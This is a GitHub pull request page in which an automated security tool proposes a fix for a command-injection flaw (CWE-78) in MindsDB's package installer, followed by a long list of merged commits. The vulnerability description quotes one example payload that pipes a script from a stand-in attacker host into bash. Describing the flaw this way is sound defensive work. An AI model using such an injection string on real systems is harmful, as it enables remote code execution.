Skip to content

fix: sanitize subprocess call in install.py#12430

Open
orbisai0security wants to merge 794 commits into
mindsdb:developfrom
orbisai0security:fix-v-001-subprocess-command-injection-install
Open

fix: sanitize subprocess call in install.py#12430
orbisai0security wants to merge 794 commits into
mindsdb:developfrom
orbisai0security:fix-v-001-subprocess-command-injection-install

Conversation

@orbisai0security
Copy link
Copy Markdown

@orbisai0security orbisai0security commented May 6, 2026

Summary

Fix critical severity security issue in mindsdb/integrations/utilities/install.py.

Vulnerability

Field Value
ID V-001
Severity CRITICAL
Scanner multi_agent_ai
Rule V-001
File mindsdb/integrations/utilities/install.py:41
CWE CWE-78

Description: The subprocess.Popen call at install.py:41 is used for installing integration packages. If the package name or installation arguments are derived from user-supplied input (e.g., via API requests specifying which handler to install), an attacker can inject shell metacharacters (e.g., '; curl attacker.com/shell.sh | bash') to execute arbitrary OS commands with the privileges of the MindsDB process. The security assessment identifies this as a command execution operation reachable via user input.

Changes

  • mindsdb/integrations/utilities/install.py

Verification

  • Build passes
  • Scanner re-scan confirms fix
  • LLM code review passed

Automated security fix by OrbisAI Security

tino097 and others added 30 commits February 27, 2026 20:33
@tino097
Merge branch 'feature/fqe-2135-move-commutnity-handlers' into bugifix…
e5f84e6 
…/fix-tests-for-community-handlers
@tino097
Fix tests for community handlers
2bcec70
@tino097
Ruff format
8e3e1ca
@ea-rus
Added timeout (5 seconds), if it passed: don't try to fetch sample of…
35a32ce 
… data and fetch all records
@ea-rus
fix selecting from view
a37b411
@ea-rus
fix join with cte
7f02542
@ea-rus
tests
c00a2ee
@ea-rus
fix tests
5c1c235
@tino097
Updates in join queries
9e835be
@tino097
Rearange imports
bb5150b
@tino097
Update imports
e6bbd1c
@torrmal @MinuraPunchihewa @StpMax
have native query passthrough (mindsdb#12264)
aeca4da 
Co-authored-by: Minura Punchihewa <minurapunchihewa17@gmail.com>
Co-authored-by: Max Stepanov <stpmax@yandex.ru>
@tino097
Dont show schema for hubpspot as it causes issues with minds
33614f4
@tino097
Fix the join statements
044a386
@tino097
Remove prints, add meta foreign keys for the association tables
4f5e4ed
@ea-rus
prevent duplicated columns in view
90b9007
@tino097
Revert back the schema name
5d10b63
@martyna-mindsdb
docs homepage
8a0a28a
@ea-rus
fix
7f2cc88
@tino097
Add Leads to Hubspot Handler (mindsdb#12243)
ea62182
@tino097
Merge remote-tracking branch 'origin/releases/26.1.0' into bugfix/fqe…
f3a138c 
…-2146-hubspot-multitable-join
@StpMax
Merge branch 'main' into releases/26.1.0
f3f9746
@StpMax
Ability for data handlers to stream data (mindsdb#12018)
bb9dddf
@martyna-mindsdb
draft homepage
77f5f34
@ea-rus
Faiss ivf file (mindsdb#12162)
7ff5b4f
@StpMax
Fix for queries to API handler with IN filter (mindsdb#12226)
2e62d37
@StpMax
Use uv as a fallback if pip is not found when installing a handle…
98781f6 
…r's dependencies (mindsdb#12234)
@martyna-mindsdb
mintlify update (mindsdb#12275)
3f49e7c
@martyna-mindsdb
updates
3ec0c73
@tino097
Fix multijoin to return message for using association tables
fa62c18
dependabot Bot and others added 28 commits April 15, 2026 20:34
@dependabot
Bump python-multipart from 0.0.20 to 0.0.26 in /requirements
6304802 
Bumps [python-multipart](https://github.com/Kludex/python-multipart) from 0.0.20 to 0.0.26.
- [Release notes](https://github.com/Kludex/python-multipart/releases)
- [Changelog](https://github.com/Kludex/python-multipart/blob/master/CHANGELOG.md)
- [Commits](Kludex/python-multipart@0.0.20...0.0.26)

---
updated-dependencies:
- dependency-name: python-multipart
  dependency-version: 0.0.26
  dependency-type: direct:production
...

Signed-off-by: dependabot[bot] <support@github.com>
@tino097
Remove community handlers (mindsdb#12250)
9b910a1
@tino097
Cleanup tests from other PRs
f0e042e
@tino097
Cleanup tests from other PRs (mindsdb#12389)
12653df
@dependabot
Bump filelock from 3.18.0 to 3.20.3 in /requirements (mindsdb#12093)
9bff4e9 
Signed-off-by: dependabot[bot] <support@github.com>
Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com>
@dependabot @torrmal @StpMax
Bump basic-ftp from 5.2.0 to 5.3.0 in /docs (mindsdb#12393)
6419e86 
Signed-off-by: dependabot[bot] <support@github.com>
Co-authored-by: Jorge Torres <jorge.torres.maldonado@gmail.com>
Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com>
Co-authored-by: Max Stepanov <stpmax@yandex.ru>
@StpMax
Merge branch 'main' into releases/26.1.0
914e0c0
@StpMax
Bump follow-redirects from 1.15.11 to 1.16.0 in /docs (mindsdb#12387)
56b66ee
@StpMax
Merge branch 'releases/26.1.0' into dependabot/pip/requirements/pytho…
a538901 
…n-multipart-0.0.26
@StpMax
Bump picomatch in /docs (mindsdb#12330)
b530bb6
@StpMax
Bump python-multipart from 0.0.20 to 0.0.26 in /requirements (mindsdb…
05b012d 
…#12388)
@StpMax
Merge branch 'releases/26.1.0' into fix/path-traversal-validation
cb6e27c
@StpMax
security(utilities): harden path traversal validation in safe_extract (
bc554ec 
…mindsdb#12347)
@StpMax
ruff
ad9d7d4
@StpMax
More secure file extraction (mindsdb#12394)
f77e2ab
@StpMax
bump version to 26.1.0rc1
22354d9
@tino097
Cleanup docker bake (mindsdb#12395)
6abaccb
@StpMax
fix mcp oauth in docker (mindsdb#12397)
fcb983c
@StpMax
bump version to v26.1.0
76f7f5e
@StpMax
del debug message
42f6fea
@StpMax
fix
a4d9f0b
@StpMax
fix
43f1ef3
@StpMax
Release 26.1.0 (mindsdb#12249)
86be14b
@StpMax @lucas-koontz
@MinuraPunchihewa @torrmal @tino097 @ZoranPandovski
Release 26.2.0 (mindsdb#12402)
c89e959 
Co-authored-by: Lucas Koontz <lucas.emanuel.koontz@gmail.com>
Co-authored-by: Minura Punchihewa <49385643+MinuraPunchihewa@users.noreply.github.com>
Co-authored-by: Jorge Torres <jorge.torres.maldonado@gmail.com>
Co-authored-by: Konstantin Sivakov <konstantin.sivakov@gmail.com>
Co-authored-by: Zoran Pandovski <zoran.pandovski@gmail.com>
@lucas-koontz
Fixes missing permissions in staging workflow (mindsdb#12418)
abc1042
@martyna-mindsdb
Update README.md (mindsdb#12423)
8d3cf79
@martyna-mindsdb
updating homepage anton link (mindsdb#12422)
37ccd07
@orbisai0security
fix: V-001 security vulnerability
39e1444 
Automated security fix generated by Orbis Security AI
@orbisai0security orbisai0security requested a review from a team as a code owner May 6, 2026 13:14
@entelligence-ai-pr-reviews
Copy link
Copy Markdown
Contributor

entelligence-ai-pr-reviews Bot commented May 6, 2026

Automatic Review Skipped

Too many files for automatic review.

If you would still like a review, you can trigger one manually by commenting:

@entelligence review

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Reviewers

No reviews

Assignees

No one assigned

Labels

None yet

Projects

None yet

Milestone

No milestone

Development

Successfully merging this pull request may close these issues.